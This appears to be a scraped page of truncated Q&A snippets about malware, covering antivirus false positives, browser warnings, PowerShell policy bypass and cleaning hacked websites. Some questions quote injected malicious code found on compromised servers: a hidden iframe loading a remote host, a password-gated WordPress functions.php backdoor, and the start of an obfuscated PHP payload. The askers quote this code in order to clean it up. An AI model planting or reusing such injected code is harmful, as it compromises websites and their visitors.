malware

How to prevent my .exe to be recognized as malware?

巧了我就是萌 submitted on 2019-12-25 07:59:16
Question: I have written a little tool a few days ago (see GitHub project here) that works as a single .exe portable file. It is compiled/linked with: cl mytool.c I have uploaded the .exe on internet, but when people try to download it (direct link here), the file is seen as malware / potential threat, and thus can't be downloaded. (Note that when disabling antivirus for 10 minutes, it is possible to download it successfully.) How to compile/link my tool so that my .exe file is seen as potential

“Deceptive site ahead” on google chrome and malicious code can not be isolated

浪尽此生 submitted on 2019-12-25 07:34:29
Question: I am receiving a notification in Google Chrome: Deceptive site ahead. Attackers on {mysite-here}... may trick you into doing something dangerous like installing software or revealing your personal information (for example, passwords, phone numbers or credit cards). Google webmasters tools provide information: Harmful content. Request in process. Google has detected harmful content on some of your site’s pages. We recommend that you remove it as soon as possible. Until then, browsers such as Google

Looking for script to delete iframe malware from linux server

末鹿安然 submitted on 2019-12-24 10:56:04
Question: I'm looking for a script to delete the following iframe malware from my Linux server: <iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;" ></iframe> It has infected hundreds of files on my server on different websites. I tried grep -rl ishigo.sytes.net * | sed 's/ /\ /g' | xargs sed -i 's/<iframe width="1px" height="1px" src="http://ishigo.sytes.net/openstat/appropriate/promise-ourselves.php" style="display:block;"

How to get rid of “SiteLock-PHP-FILEHACKER-of.UNOFFICIAL” in WordPress functions.php

元气小坏坏 submitted on 2019-12-24 09:10:15
Question: <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</w><url>' . $data['guid'

Prevent bypassing PowerShell execution policy

帅比萌擦擦* submitted on 2019-12-24 08:24:14
Question: We have PowerShell installed on our RDS environment. It's currently being used for tasks like remote management and App-V virtual application publishing. To my understanding, it's fairly easy to bypass a restricted execution policy. I can't, however, find any useful information on preventing bypassing the execution policy (or making it a lot harder). I was thinking about using file screening (AppLocker) for blocking PowerShell files, but I guess then attackers could just use a VBA script

What are good programming practices to prevent malware in standalone applications?

大憨熊 submitted on 2019-12-24 08:00:03
Question: Does anyone have any thoughts on how to prevent malware attacks on standalone applications? Let's say this is a program on a Windows machine connected to the internet; this is the most common scenario. I'm also wondering what type of attacks are possible. I believe .NET will do some type of static check on the code before it runs it, using a type of checksum. This would detect a statically attached malicious code snippet. Can this be gotten around? What about dynamically injected code?

Malware on website hxxp looks suspicious

我与影子孤独终老i submitted on 2019-12-23 23:08:08
Question: Google has detected malicious file/malware on our website. I checked it with redleg and some of these values are displayed yellow. <div style=" display: none ;"> <input type="hidden" name="_wpcf7" value="41" /> <input type="hidden" name="_wpcf7_version" value="4.3" /> <input type="hidden" name="_wpcf7_locale" value="" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f41-o1" /> <input type="hidden" name="_wpnonce" value="649583a56e" /> </div> PS. I change our website links here to

Malicious code found in WordPress theme files. What does it do?

只谈情不闲聊 submitted on 2019-12-23 06:40:54
Question: I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j

Malicious text appears in all pages and posts. How do I get rid of it?

早过忘川 submitted on 2019-12-22 10:31:32
Question: Yesterday I had installed several outdated plugins (my bad) in order to make my BuddyPress registration page display “the terms and conditions” checkbox and since then all the pages and posts started displaying some unwanted text at the start and bottom. I have removed all those plugins but still I’m getting the message. I tried several malware scanners like Wordfence, Sucuri, etc. but everything says my website is clean. I'm out of options now. Please help me get rid of it from my site. At

My android app is detected as malware by Avast

我只是一个虾纸丫 submitted on 2019-12-21 04:38:12
Question: I have created an Android application, but Avast detects this as malware. Why is this? Can anyone tell me some more info about this, so I can locate what exactly is considered a virus in this app? This is a very simple app, so I have no idea what might have caused this. I have reported this as a false positive and also contacted Avast via their forum. But I guess it won't hurt to post here as well; maybe someone has/had a similar problem. Answer 1: Your app may be detected for several reasons: you